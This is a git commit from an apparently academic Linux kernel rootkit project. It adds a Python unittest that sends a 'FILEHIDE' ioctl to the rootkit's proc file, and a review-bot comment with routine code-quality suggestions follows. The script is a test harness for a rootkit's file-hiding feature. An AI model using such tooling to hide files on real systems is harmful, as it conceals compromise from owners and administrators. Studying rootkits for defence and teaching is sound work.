linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit c0f6c3f9d116a5e13d53b219404f856d663cea4b
parent 79eae0f0a870cee54edc4949948d22d7ea3bd723
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 21 Nov 2020 15:30:11 +0100

adds filehide test script

Diffstat:
Atoggle_filehide.py | 25+++++++++++++++++++++++++
1 file changed, 25 insertions(+), 0 deletions(-)

diff --git a/toggle_filehide.py b/toggle_filehide.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python3
+
+import fcntl
+import os
+import unittest
+import argparse
+import sys
+
+IOCTL_FILEHIDE = 0x80084001
+
+proc_fd = None
+
+class TestIOCTLPing(unittest.TestCase):
+    def test_filehide(self):
+        arg = b"FILEHIDE"
+        res = fcntl.ioctl(proc_fd, IOCTL_FILEHIDE, arg)
+        self.assertEqual(res, b"FILEHIDE")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("proc_file")
+    args, remaining = parser.parse_known_args()
+    proc_fd = os.open(args.proc_file, os.O_RDWR)
+
+    unittest.main(argv=[sys.argv[0]] + remaining)
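Review bot: The descriptor opened with `os.open(args.proc_file, os.O_RDWR)` in the `__main__` block is never closed, and because `unittest.main()` ends the process through `sys.exit`, an `os.close(proc_fd)` placed after it would never run either. Passing `exit=False` and closing in a `finally` makes the handle's lifetime explicit: `try: unittest.main(argv=[sys.argv[0]] + remaining, exit=False)` / `finally: os.close(proc_fd)`. The class name `TestIOCTLPing` no longer matches its only method `test_filehide`, so renaming it to something like `TestIOCTLFilehide` would keep the test report readable. A short comment on `IOCTL_FILEHIDE` noting that the constant must agree with the request number the kernel module registers would help anyone who regenerates it, since a mismatched value fails at runtime rather than at import.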